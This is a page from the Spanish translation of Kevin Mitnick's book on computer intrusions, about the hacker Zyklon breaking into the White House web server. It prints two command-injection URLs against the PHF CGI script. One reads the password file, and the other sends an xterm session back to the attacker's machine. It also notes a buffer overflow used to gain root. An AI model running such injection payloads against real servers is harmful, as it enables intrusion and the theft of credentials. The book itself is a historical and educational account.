Kevin mitnick el arte de la intrusión

Page 86

62

EL ARTE DE LA INTRUSIÓN

©RAMA

entrada en el formulario que incluyera la versión codificada (0x0a) del carácter de línea nueva. Al enviar una cadena que incluyera este carácter se engaña al código para que ejecute cualquier comando que el atacante elija. Zyklon escribió en su explorador la URL: http://www.whitehouse.gov/cgibin/phf?Qalias=x%0a/bin/cat%2 0/etc/passwd

Con esto, pudo visualizar el archivo de contraseñas de whitehouse.gov. Pero quería obtener el control total del servidor Web de la Casa Blanca. Sabía que era muy probable que los puertos del servidor X estuvieran bloqueados por el cortafuegos, lo que le impediría conectarse a cualquiera de los servicios de whitehouse.gov. Por tanto, en lugar de eso, recurrió una vez más al agujero de PHF introduciendo: http://www.whitehouse.gov/cgibin/phf?Qalias=x%0a/usr/XllR6/bin/xterm%2 0ut%20-display%20zyklons.ip.address:O.O

Esto provocó el envió de un xterm desde el servidor de la Casa Blanca a un ordenador que estaba bajo su control y que ejecutaba un servidor X. Es decir, en lugar de conectarse a whitehouse.gov, lo que hizo en realidad fue ordenar al sistema de la Casa Blanca que se conectara a él, (Esto sólo es posible cuando el cortafuegos permite las conexiones salientes, lo que aparentemente fue el caso). A continuación aprovechó la vulnerabilidad de desbordamiento del búfer hallada en el programa del sistema, — ufsrestore. Y eso, asegura Zyklon, le permitió obtener el acceso de superusuario de whitehouse.gov, así como acceder al servidor de correo de la Casa Blanca y otros sistemas de la red.

CONTRAMEDIDAS Los artificios de neOh y Comrade que hemos descrito aquí plantean dos problemas para las compañías.


Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.